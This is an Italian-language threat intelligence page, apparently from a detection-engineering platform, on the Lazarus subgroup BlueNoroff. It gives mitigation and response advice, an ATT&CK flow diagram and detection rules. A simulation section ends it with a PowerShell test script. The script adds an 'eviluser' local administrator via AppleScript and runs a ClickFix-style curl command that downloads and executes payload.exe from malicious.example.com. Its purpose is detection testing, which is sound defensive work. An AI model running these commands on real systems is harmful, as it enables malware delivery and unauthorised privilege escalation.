Segui
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
BlueNoroff è un sottogruppo finanziariamente orientato all’interno dell’ecosistema Lazarus che si concentra su operazioni di furto di alto valore contro banche, aziende di criptovaluta e obiettivi più ampi legati al Web3. Il playbook del gruppo comprende frodi abilitate da SWIFT, compromessi in modalità watering-hole, avvelenamenti della catena di fornitura di pacchetti Go e percorsi di intrusione su macOS costruiti attorno a false esche di “colloquio di lavoro”. Per raggiungere l’esecuzione e la persistenza, BlueNoroff combina uno stack malware modulare Rust/Go con AppleScript, VBScript e flussi di lavoro di ingegneria sociale progettati per aggirare l’attenzione degli utenti e integrarsi nel legittimo sviluppo e attività amministrativa.
Indagine
Il rapporto traccia la traiettoria di BlueNoroff dal colpo alla Banca del Bangladesh del 2016 fino alla più recente attività di compromissione della catena di fornitura del 2025, evidenziando come gli strumenti e i target dell’attore si siano ampliati insieme all’ecosistema crypto/Web3. I ricercatori descrivono i modelli di infrastruttura e catalogano componenti di malware tra cui GhostCall, GhostHire, RustBucket e GillyInjector. L’indagine mappa anche i comportamenti osservati su MITRE ATT&CK attraverso fasi come ricognizione e accesso iniziale, poi esecuzione, persistenza e furto di credenziali, sottolineando un constante focus su piede stabile, consegna di payload in fasi e percorsi di accesso pronti al furto.
Mitigazione
Riduci l’esposizione rafforzando l’igiene della catena di fornitura: valida i pacchetti prelevati da registry pubblici, applica controlli di pinning e provenienza e rivedi continuamente aggiornamenti delle dipendenze per modifiche inaspettate di manutentori o codici. Su macOS, rinforza la governance di LaunchAgent/LaunchDaemon e monitora le voci di persistenza sospette e strumenti non firmati. Blocca i domini doppelgänger usati per la consegna di esche, applica MFA per identità privilegiate e servizi esposti esternamente e rendi operative le rilevazioni per script, loader e tecniche di packing malevoli noti associate all’attore. Mantieni frequenti aggiornamenti di intelligence sulle minacce e rafforza la formazione degli utenti concentrata su modelli di ingegneria sociale di spear-phishing e “recruiter/colloquio di lavoro”.
Risposta
Se vengono scoperti indicatori BlueNoroff, isola gli host coinvolti e conserva le prove chiave, comprese tutte le linee di comando, il contenuto degli script e i binari o artefatti del pacchetto scaricati. Blocca i domini malevoli identificati e gli IP C2, quindi esegui i playbook di risposta agli incidenti allineati agli scenari di furto di credenziali e compromissione della catena di fornitura. Distribuisci o sintonizza le rilevazioni per catene di esecuzione AppleScript e VBScript e per modelli sospetti di PowerShell menzionati nel rapporto, quindi amplia la ricerca per identificare endpoint aggiuntivi esposti alla stessa esca, dipendenza o sovrapposizione di infrastruttura.
“graph TB %% Class Definitions classDef technique fill:#99ccff classDef action fill:#ffdd99 classDef operator fill:#ff9900 %% Technique Nodes gather_identity[“<b>Tecnica</b> – <b>T1589 Raccolta Informazioni Identità della Vittima</b><br/>Raccoglie informazioni personali, professionali e online sul bersaglio.”] class gather_identity technique search_social[“<b>Tecnica</b> – <b>T1593.001 Ricerca sui Social Media</b><br/>Interroga account social appartenenti alla vittima per localizzare dati utili.”] class search_social technique phish_info[“<b>Tecnica</b> – <b>T1598.001 Phishing per Informazioni</b><br/>Crea messaggi per ingannare le vittime a rivelare credenziali o altri dati.”] class phish_info technique spearphish_service[“<b>Tecnica</b> – <b>T1566.003 Spearphishing tramite Servizio</b><br/>Utilizza un servizio online legittimo per fornire contenuti dannosi alla vittima.”] class spearphish_service technique launch_agent[“<b>Tecnica</b> – <b>T1543.001 Avvio Agent</b><br/>Installa un agent di avvio macOS per ottenere persistenza.”] class launch_agent technique launch_daemon[“<b>Tecnica</b> – <b>T1543.004 Avvio Daemon</b><br/>Installa un daemon di avvio macOS per ottenere persistenza.”] class launch_daemon technique tcc_manip[“<b>Tecnica</b> – <b>T1548.006 Manipolazione TCC</b><br/>Modifica le impostazioni di Trasparenza, Consenso e Controllo per ottenere privilegi più elevati.”] class tcc_manip technique software_packing[“<b>Tecnica</b> – <b>T1027.002 Confezionamento del Software</b><br/>Comprime o cripta il payload per sfuggire all’analisi.”] class software_packing technique masquerading[“<b>Tecnica</b> – <b>T1036.005 Mascheramento</b><br/>Rinomina file o utilizza icone familiari per apparire legittimo.”] class masquerading technique gui_input[“<b>Tecnica</b> – <b>T1056.002 Acquisizione Input GUI</b><br/>Registra tasti o input del mouse da interfacce grafiche per rubare credenziali.”] class gui_input technique system_info[“<b>Tecnica</b> – <b>T1082 Scoperta Informazioni di Sistema</b><br/>Raccoglie versione OS, dettagli hardware e software installato.”] class system_info technique data_local[“<b>Tecnica</b> – <b>T1005 Dati da Sistema Locale</b><br/>Copia file di interesse dall’host infetto.”] class data_local technique local_staging[“<b>Tecnica</b> – <b>T1074.001 Preparazione Dati Locali</b><br/>Colloca i dati raccolti in una directory per successiva esfiltrazione.”] class local_staging technique web_protocols[“<b>Tecnica</b> – <b>T1071.001 Protocolli Web</b><br/>Utilizza HTTP/HTTPS per traffico di comando e controllo.”] class web_protocols technique dead_drop[“<b>Tecnica</b> – <b>T1102.001 Risolutore Dead Drop</b><br/>Recupera istruzioni da una posizione ospitata pubblicamente.”] class dead_drop technique bidirectional[“<b>Tecnica</b> – <b>T1102.002 C2 Bidirezionale</b><br/>Permette comunicazione bidirezionale tra attaccante e malware.”] class bidirectional technique oneway[“<b>Tecnica</b> – <b>T1102.003 C2 Monodirezionale</b><br/>Riceve solo comandi dall’attaccante senza inviare dati indietro.”] class oneway technique %% Action Nodes user_click[“<b>Azione</b> – L’utente clicca sul link malevolo e scarica il payload”] class user_click action %% Operator Node (optional AND for persistence options) op_persistence((“AND”)) class op_persistence operator %% Connections gather_identity u002du002d>|porta a| search_social search_social u002du002d>|porta a| phish_info phish_info u002du002d>|porta a| spearphish_service spearphish_service u002du002d>|attiva| user_click user_click u002du002d>|stabilisce| op_persistence op_persistence u002du002d>|utilizza| launch_agent op_persistence u002du002d>|utilizza| launch_daemon launch_agent u002du002d>|abilita| tcc_manip launch_daemon u002du002d>|abilita| tcc_manip tcc_manip u002du002d>|abilita| software_packing tcc_manip u002du002d>|abilita| masquerading software_packing u002du002d>|facilita| gui_input masquerading u002du002d>|facilita| gui_input gui_input u002du002d>|fornisce| system_info system_info u002du002d>|supporta| data_local data_local u002du002d>|prepara| local_staging local_staging u002du002d>|esfiltra tramite| web_protocols web_protocols u002du002d>|supporta| dead_drop dead_drop u002du002d>|supporta| bidirectional bidirectional u002du002d>|supporta| oneway “
Flusso d’attacco
Rilevamenti
Possibile Scoperta della Configurazione di Rete di Sistema (tramite cmdline)
Visualizza
Possibile Scoperta di Sistema Remoto o Verifica Connettività (tramite cmdline)
Visualizza
Binari Sospetti / Script in Posizione di Avvio Automatico (tramite file_event)
Visualizza
Possibile Enumerazione Account o Gruppo Amministratore (tramite cmdline)
Visualizza
IOC (Email) da rilevare: Gruppo BlueNoroff: Il Braccio del Crimine Cyber Finanziario di Lazarus
Visualizza
Rilevamento di AppleScript malevoli ed Esecuzione di Comandi ClickFix [Creazione Processo Windows]
Visualizza
Enumerazione di Utenti Locali e di Dominio tramite Comandi Net [Windows Sysmon]
Visualizza
Rilevazione di Offuscamento ed Encoding PowerShell BlueNoroff [Windows Powershell]
Visualizza
Esecuzione di Simulazione
Prerequisito: La Verifica Pre-volo di Telemetria e Baseline deve essere passata.
Razionale: Questa sezione dettaglia l’esatta esecuzione della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrazione & Comandi di Attacco:
- Esecuzione di AppleScript (T1546.016) – L’attaccante deposita un
payload.scptmalevolo sull’endpoint (es. tramite un allegato di phishing). Utilizzando unosascript.exepreinstallato (incluso con uno strumento di terze parti), lanciano lo script per eseguire un payload PowerShell che aggiunge un nuovo account amministratore locale. - Consegna alla Clipboard tramite ClickFix (T1204.004) – L’attaccante copia un comando creato per la clipboard che invoca
curlcon uno user-agent stile Zoom per scaricare un payload di seconda fase, quindi lo esegue immediatamente tramitecmd.exe. Il comando include anche una chiamatapowershell.exe -cinline per eseguire il payload in memoria.
- Esecuzione di AppleScript (T1546.016) – L’attaccante deposita un
-
Script di Test di Regressione: Lo script seguente riproduce entrambi i comportamenti in modo deterministico.
#----- BEGIN REGRESSION TEST SCRIPT ----- # Assicurarsi di eseguire con privilegi amministrativi if (-not ([Security.Principal.WindowsPrincipal] ` [Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Error "Esegui questo script come Amministratore." exit 1 } # 1. Esecuzione di AppleScript tramite osascript.exe $appleScriptPath = "$env:TEMPmalicious.scpt" Set-Content -Path $appleScriptPath -Value @" tell application "System Events" do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`"" end tell "@ # Esegui l'AppleScript Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait # 2. Consegna alla Clipboard stile ClickFix $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"' # Esegui tramite cmd.exe per corrispondere alla condizione della regola Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait # Pulizia: rimuovi artefatti Remove-Item -Path $appleScriptPath -Force Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # End of script #----- END REGRESSION TEST SCRIPT ----- -
Comandi di Pulizia: Rimuovere eventuali processi, file e account utente di test rimanenti.
# Interrompi eventuali processi rimanenti (difensivo – normalmente non necessario) Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force # Elimina file temporanei Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Rimuovi l'account admin di test se è stato creato if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) { Remove-LocalUser -Name "eviluser" }